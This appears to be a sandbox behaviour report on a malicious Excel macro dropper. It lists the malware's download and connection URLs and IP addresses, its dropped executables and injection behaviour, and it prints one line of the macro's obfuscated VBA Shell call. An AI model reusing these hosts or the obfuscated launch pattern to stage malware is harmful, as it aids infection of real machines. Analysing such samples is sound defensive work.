VTI rule match with VTI rule score 5/5
vmray_modify_control_flow_non_system
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" alters context of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe"
Modifies control flow of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_control_flow_non_system
"c:\programdata\oyvgkgw.exe" alters context of "c:\programdata\oyvgkgw.exe"
Modifies control flow of a process running from a created or modified executable
Network
VTI rule match with VTI rule score 2/5
vmray_reputation_url_malicious
URL "197.245.46.11" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 2/5
vmray_reputation_url_malicious
URL "216.46.44.93" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "www.icb.cl/ZxavoDe/".
Downloads data
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "197.245.46.11".
Downloads data
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "216.46.44.93".
Downloads data
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "94.70.244.227".
Downloads data
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "www.icb.cl/ZxavoDe/".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "197.245.46.11".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "216.46.44.93".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "http://94.70.244.227:80/whoami.php".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "94.70.244.227".
Connects to HTTP server
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "c:\users\kft6utqw\appdata\local\temp\280.exe".
Drops PE file
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "c:\programdata\oyvgkgw.exe".
Drops PE file
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe".
Drops PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "c:\users\kft6utqw\appdata\local\temp\280.exe".
Executes dropped PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "c:\programdata\oyvgkgw.exe".
Executes dropped PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe".
Executes dropped PE file
VBA Macro
VTI rule match with VTI rule score 1/5
vmray_execute_macro_on_ws_event
Executes macro on "Activate Workbook" event.
Executes macro on specific worksheet event
VBA Macro
VTI rule match with VTI rule score 2/5
vmray_execute_application
DmvtdQv = DtEFQrZRRpI + HYmQfXj + Shell(WzPZHVRYA + whKqOB + haTFtqcwzK, (20827 / 20827) - 1)
Executes application